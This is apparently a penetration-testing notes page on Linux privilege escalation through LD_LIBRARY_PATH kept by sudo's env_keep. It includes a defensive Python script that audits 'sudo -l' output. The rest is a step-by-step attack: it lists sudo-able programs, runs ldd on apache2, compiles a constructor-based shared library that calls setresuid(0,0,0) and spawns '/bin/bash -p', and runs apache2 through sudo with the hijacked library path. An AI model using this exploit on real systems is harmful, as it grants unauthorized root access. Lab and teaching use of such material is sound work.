# LD\_LIBRARY\_PATH

Programs running via sudo can inherit variables from the environment of the user. If the **env\_reset** option is set in the **/etc/sudoers** config file, sudo will run the programs in a new, minimal *environment*. The **env\_keep** option can be used to keep certain environment variables from the user’s environment. The configured options are displayed when running **sudo -l**.

**LD\_LIBRARY\_PATH** is inherited from the user's environment. It contains a list of directories that the dynamic linker searches for shared libraries first.
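The following is an added example, not part of the original notes: a Python check that parses `sudo -l` output and reports whether dynamic-linker variables such as LD\_LIBRARY\_PATH are kept through **env\_keep**, and which sudo rules that exposes. The sample output, user name and host are constructed, and the function name `audit_sudo_l` is hypothetical.

```python
import re

# Constructed sample of `sudo -l` output (user name and host are placeholders;
# the two programs are the ones this page inspects with ldd).
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/sbin/apache2
"""

KEEP_RE = re.compile(r'env_keep\s*(\+=|-=|=)\s*"?([^"]*)"?')
RULE_RE = re.compile(r'\s+\([^)]*\)\s+(?:[A-Z]+:\s*)*(\S.*)')


def audit_sudo_l(output):
    """Return env_reset state, kept LD_* variables and the sudo-able commands."""
    env_reset, kept, commands, section = False, set(), [], None
    for line in output.splitlines():
        if line.startswith("Matching Defaults entries"):
            section = "defaults"
        elif "may run the following commands" in line:
            section = "rules"
        elif section == "defaults":
            for item in (part.strip() for part in line.split(",")):
                keep = KEEP_RE.fullmatch(item)
                if item in ("env_reset", "!env_reset"):
                    env_reset = not item.startswith("!")
                elif keep:
                    op, names = keep.group(1), set(keep.group(2).split())
                    # "=" replaces the list, "+=" extends it, "-=" removes from it
                    kept = names if op == "=" else kept | names if op == "+=" else kept - names
        elif section == "rules":
            rule = RULE_RE.fullmatch(line)
            if rule:
                commands.append(rule.group(1))
    # Any kept dynamic-linker variable lets the caller steer library loading.
    risky = sorted(name for name in kept if name.startswith("LD_"))
    return {"env_reset": env_reset, "risky_kept": risky,
            "exposed_commands": commands if risky else []}


if __name__ == "__main__":
    print(audit_sudo_l(SAMPLE_SUDO_L))
```

A non-empty `risky_kept` list means the matching **env\_keep** entries should be removed from sudoers so that **env\_reset** strips those variables again.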

### Steps

#### Investigate the sudo-able programs and the libraries used.

{% code overflow="wrap" %}

```bash
# Check if you see any sudo configuration for your username
sudo -l
```

{% endcode %}


```bash
# Check which shared libraries the sudo-able programs load. In this case, apache2
ldd /usr/sbin/iftop
# ...
ldd /usr/sbin/apache2
```


#### Compile the following code as a shared library.

```c
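#define _GNU_SOURCE     /* exposes setresuid() in <unistd.h> */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Constructor: runs automatically when the dynamic linker loads this library */
static void hijack() __attribute__((constructor));

void hijack() {
        /* Clear the variable so child processes load the real libraries */
        unsetenv("LD_LIBRARY_PATH");
        /* Set the real, effective and saved UIDs to root */
        setresuid(0,0,0);
        /* Start a shell; -p stops bash from dropping the effective UID */
        system("/bin/bash -p");
}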
```

```bash
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
```

#### Run the program through sudo to escalate privileges


```bash
sudo LD_LIBRARY_PATH=/tmp apache2
```

